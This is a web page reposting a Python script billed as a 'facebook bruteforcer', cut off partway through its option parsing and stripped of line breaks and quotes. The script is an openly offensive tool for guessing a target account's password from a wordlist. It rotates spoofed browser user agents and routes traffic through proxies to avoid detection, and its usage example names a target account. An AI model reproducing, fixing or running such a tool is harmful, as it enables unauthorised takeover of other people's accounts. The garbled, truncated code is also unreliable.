#!/usr/bin/python # This is facebook bruteforcer tools # This - TopicsExpress



          

#!/usr/bin/python # This is facebook bruteforcer tools # This was written for educational purpose and pentest only. Use it at your own risk. # Author will not be responsible for any damage !! # Toolname : facebookbruteforcer.py # Programmer : Gunslinger_ # Version : 1.0 # Date : Tue Jul 27 13:24:44 WIT 2010 # Special thanks to mywisdom to inspire me import re import os import sys import random import warnings import time try: import mechanize except ImportError: print [*] Please install mechanize python module first sys.exit(1) except KeyboardInterrupt: print \n[*] Exiting program... \n sys.exit(1) try: import cookielib except ImportError: print [*] Please install cookielib python module first sys.exit(1) except KeyboardInterrupt: print \n[*] Exiting program... \n sys.exit(1) warnings.filterwarnings (action=ignore, message=.*gzip transfer encoding is experimental!, category=UserWarning) # define variable __programmer__ = gunslinger_ __version__ = 1.0 verbose = False useproxy = False usepassproxy = False log = fbbruteforcer.log file = open(log, a) success = facebook/? sk=messages&ref=mb fblogin = https:// login.facebook/login.php? login_attempt=1 # some cheating .. ouruseragent = [Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11), Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;, Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0), Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1), Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6), Microsoft Internet Explorer/4.0b1 (Windows 95), Opera/8.00 (Windows NT 5.1; U; en), amaya/9.51 libwww/5.4.0, Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome), Mozilla/4.0 (compatible; MSIE 5.5; Windows NT), Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu), Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322), Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email protected]), Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en] ] facebook = __ _ _ / _| | | | | | |_ __ _ ___ ___| |__ ___ ___ | | __ | _/ _` |/ __/ _ \ _ \ / _ \ / _ \| |/ / | || (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\ bruteforcer... Programmer : %s Version : %s % (__programmer__, __version__) option = Usage : %s [options] Option : -u, --username | User for bruteforcing -w, --wordlist | Wordlist used for bruteforcing -v, --verbose | Set %s will be verbose -p, --proxy | Set http proxy will be use -k, --usernameproxy | Set username at proxy will be use -i, --passproxy | Set password at proxy will be use -l, --log | Specify output filename (default : fbbruteforcer.log) -h, --help | Print this help Example : %s -u brad@hackme -w wordlist.txt P.S : add & to run in the background % (sys.argv[0], sys.argv[0], sys.argv[0]) hme = Usage : %s [option] -h or --help for get help % sys.argv[0] def helpme(): print facebook print option file.write(facebook) file.write(option) sys.exit(1) def helpmee(): print facebook print hme file.write(facebook) file.write(hme) sys.exit(1) for arg in sys.argv: try: if arg.lower() == -u or arg.lower() == -- user: username = sys.argv[int(sys.argv [1:].index(arg))+2] elif arg.lower() == -w or arg.lower() == --wordlist: wordlist = sys.argv[int(sys.argv[1:].index (arg))+2] elif arg.lower() == -l or arg.lower() == --log: log = sys.argv[int(sys.argv[1:].index (arg))+2] elif arg.lower() == -p or arg.lower() == --proxy: useproxy = True proxy = sys.argv[int(sys.argv[1:].index (arg))+2] elif arg.lower() == -k or arg.lower() == --userproxy: usepassproxy = True usw = sys.argv[int(sys.argv[1:].index (arg))+2] elif arg.lower() == -i or arg.lower() == --passproxy: usepassproxy = True usp = sys.argv[int(sys.argv[1:].index (arg))+2] elif arg.lower() == -v or arg.lower() == --verbose: verbose = True elif arg.lower() == -h or arg.lower() == --help: helpme() elif len(sys.argv)
Posted on: Sun, 09 Mar 2014 10:41:21 +0000

Trending Topics



Recently Viewed Topics




© 2015